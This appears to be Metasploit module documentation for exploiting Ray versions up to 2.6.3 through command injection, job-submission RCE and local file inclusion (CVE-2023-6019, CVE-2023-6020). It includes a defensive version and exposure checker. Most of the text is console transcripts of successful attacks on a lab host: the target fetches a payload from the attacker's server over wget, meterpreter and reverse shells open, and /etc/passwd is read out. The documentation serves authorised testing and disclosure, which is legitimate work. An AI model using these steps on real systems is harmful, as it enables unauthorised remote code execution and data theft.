## Vulnerable Application

Ray (<=v2.6.3) is affected by three vulnerabilities:

* RCE via `cpu_profile` command injection (CVE-2023-6019)
* RCE via the agent job submission endpoint (no CVE)
* Local file inclusion (CVE-2023-6020)

This module exploits all three vulnerabilities.

The vulnerability affects:

* Ray (<=v2.6.3)

This module was successfully tested on:

* Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15

### Install and run the vulnerable Ray (v2.6.3)

1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
2. Install Kali Linux (or another Linux distro) in your virtualization engine.
3. Pull the pre-built Ray Docker container (v2.6.3) in your VM: `docker pull rayproject/ray:2.6.3`
4. Start the Ray container: `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3`
5. Start Ray: `ray start --head --dashboard-host=0.0.0.0`

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/ray_cmdi_rce_lfi`
4. Do: `set rhost `
5. Optional: `set rport `
6. Do: `set lhost `
7. Optional: `set CVE `
8. Do: `run`
9. You should get a shell or meterpreter

## Options

### ATTACK (required)

This is the attack type to use. Default is CMDi (`CVE-2023-6019`), but RCE (no CVE) and LFI (`CVE-2023-6020`) can also be chosen.

### COMMAND (optional)

This is the command to execute. Default is `echo 'Hello from Metasploit'`. This is used when ATTACK is set to `CMDi` or `RCE`.

### FILEPATH (optional)

This is the file to read. Default is `/etc/passwd`. This is used when ATTACK is set to `LFI`.
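The lab setup above publishes the dashboard port with `-p 8265:8265` and starts Ray with `--dashboard-host=0.0.0.0`, which is exactly the exposure this module relies on. The following triage helper is an added example (not part of the Metasploit module or of the Ray project) that a defender can run over their own launch commands and `ray --version` output: it flags an affected version (<= 2.6.3, compared as integer tuples so that 2.10.0 is not mistaken for an old release) and any binding of port 8265 beyond loopback. The `LAB_*` strings are constructed from the install steps on this page; the hardened variants and the assumption that Ray's `--dashboard-host` defaults to `127.0.0.1` are mine.

```python
"""Triage helper: affected Ray version and dashboard exposure (added example)."""
import re
import shlex

AFFECTED_MAX = (2, 6, 3)                      # Ray <= 2.6.3 is affected, per this page
LOOPBACK = ("127.0.0.1", "localhost", "::1")
DASHBOARD_PORT = "8265"
DEFAULT_DASHBOARD_HOST = "127.0.0.1"          # assumption: Ray's default when the flag is absent

# Constructed inputs: the page's lab configuration and a loopback-only variant.
LAB_VERSION = "ray, version 2.6.3"
LAB_DOCKER = "docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3"
LAB_RAY = "ray start --head --dashboard-host=0.0.0.0"
HARDENED_DOCKER = "docker run --shm-size=512M -it -p 127.0.0.1:8265:8265 rayproject/ray:2.6.3"
HARDENED_RAY = "ray start --head"


def parse_version(text: str) -> tuple:
    """Pull a dotted x.y.z version out of e.g. 'ray, version 2.6.3' or 'Version: 2.10.0'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version found in {text!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(version_text: str) -> bool:
    """Tuple comparison, not string comparison: (2, 10, 0) > (2, 6, 3)."""
    return parse_version(version_text) <= AFFECTED_MAX


def published_ports(docker_run_cmd: str) -> list:
    """Return (host_ip, host_port, container_port) for each -p/--publish on a docker run line.

    Docker binds 0.0.0.0 when the host IP is omitted, and picks an ephemeral host
    port (reported here as '') when only a container port is given."""
    argv = shlex.split(docker_run_cmd)
    result = []
    for i, tok in enumerate(argv):
        spec = None
        if tok in ("-p", "--publish") and i + 1 < len(argv):
            spec = argv[i + 1]
        elif tok.startswith("--publish="):
            spec = tok.split("=", 1)[1]
        if spec is None:
            continue
        parts = spec.split(":")
        if len(parts) == 3:
            host_ip, host_port, cport = parts
        elif len(parts) == 2:
            host_ip, host_port, cport = "0.0.0.0", parts[0], parts[1]
        else:
            host_ip, host_port, cport = "0.0.0.0", "", parts[0]
        result.append((host_ip, host_port, cport.split("/")[0]))  # drop '/tcp' suffix
    return result


def dashboard_host(ray_start_cmd: str) -> str:
    """Return the --dashboard-host value from a `ray start` line, or the assumed default."""
    argv = shlex.split(ray_start_cmd)
    for i, tok in enumerate(argv):
        if tok.startswith("--dashboard-host="):
            return tok.split("=", 1)[1]
        if tok == "--dashboard-host" and i + 1 < len(argv):
            return argv[i + 1]
    return DEFAULT_DASHBOARD_HOST


def findings(version_text: str, docker_run_cmd: str, ray_start_cmd: str) -> list:
    """Human-readable findings; an empty list means nothing on this page's checklist matched."""
    out = []
    if is_affected(version_text):
        v = ".".join(map(str, parse_version(version_text)))
        out.append(f"affected Ray version {v} (<= 2.6.3)")
    for host_ip, host_port, cport in published_ports(docker_run_cmd):
        if cport == DASHBOARD_PORT and host_ip not in LOOPBACK:
            out.append(f"dashboard port {DASHBOARD_PORT} published on {host_ip}:{host_port or '<ephemeral>'}")
    host = dashboard_host(ray_start_cmd)
    if host not in LOOPBACK:
        out.append(f"ray dashboard bound to {host}")
    return out


if __name__ == "__main__":
    for label, docker_cmd, ray_cmd in (("lab", LAB_DOCKER, LAB_RAY), ("hardened", HARDENED_DOCKER, HARDENED_RAY)):
        print(label, findings(LAB_VERSION, docker_cmd, ray_cmd))
```

Inside a container the `docker run -p` binding is what decides whether the host's interfaces expose the dashboard; the `--dashboard-host` check matters mainly for bare-metal installs. Note that the hardened variant still reports the version finding: restricting the listener reduces reachability but does not remove the vulnerabilities, which only upgrading past 2.6.3 does.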
## Scenarios

### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6019, target 0)

```
msf6 > use exploit/linux/http/ray_cmdi_rce_lfi
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6019
cve => CVE-2023-6019
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 0
target => 0
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Grabbed node info, pid: 124, ip: 172.17.0.2
[+] Command execution seems to have been successful. Status code: 500
[*] Using URL: http://192.168.56.1:8080/VvzBBm8
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /VvzBBm8
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 192.168.56.6
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:40554) at 2024-08-05 08:26:42 +0900
[*] Server stopped.

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 20.04 (Linux 6.6.15-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6019, target 1)

```
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6019
cve => CVE-2023-6019
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1
target => 1
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Grabbed node info, pid: 124, ip: 172.17.0.2
[+] Command execution seems to have been successful. Status code: 500
[*] Using URL: http://192.168.56.1:8080/tMBeDO
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /tMBeDO
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (36 bytes) to 192.168.56.6
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:39652) at 2024-08-05 08:28:46 +0900
[*] Command Stager progress - 100.00% done (111/111 bytes)
[*] Server stopped.

whoami
ray
pwd
/home/ray
```

### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (RCE, target 0)

```
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve RCE
cve => RCE
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 0
target => 0
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_TKeWeJRKQZFkU2zN' Submission ID: 'raysubmit_TKeWeJRKQZFkU2zN'
[*] Using URL: http://192.168.56.1:8080/roy19E
[*] Command Stager progress - 100.00% done (111/111 bytes)
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /roy19E
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (38 bytes) to 192.168.56.6
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:43312) at 2024-08-05 08:40:06 +0900
[*] Server stopped.

whoami
ray
pwd
/home/ray
```

### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (RCE, target 1)

```
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve RCE
cve => RCE
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1
target => 1
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_g4jZ3U5aQu4gYrFy' Submission ID: 'raysubmit_g4jZ3U5aQu4gYrFy'
[*] Using URL: http://192.168.56.1:8080/ZMCKWGQCHh
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /ZMCKWGQCHh
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (36 bytes) to 192.168.56.6
[*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:42666) at 2024-08-05 08:41:22 +0900
[*] Server stopped.

whoami
ray
pwd
/home/ray
```

### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6020)

```
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6020
cve => CVE-2023-6020
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
ray:x:1000:100::/home/ray:/bin/bash
```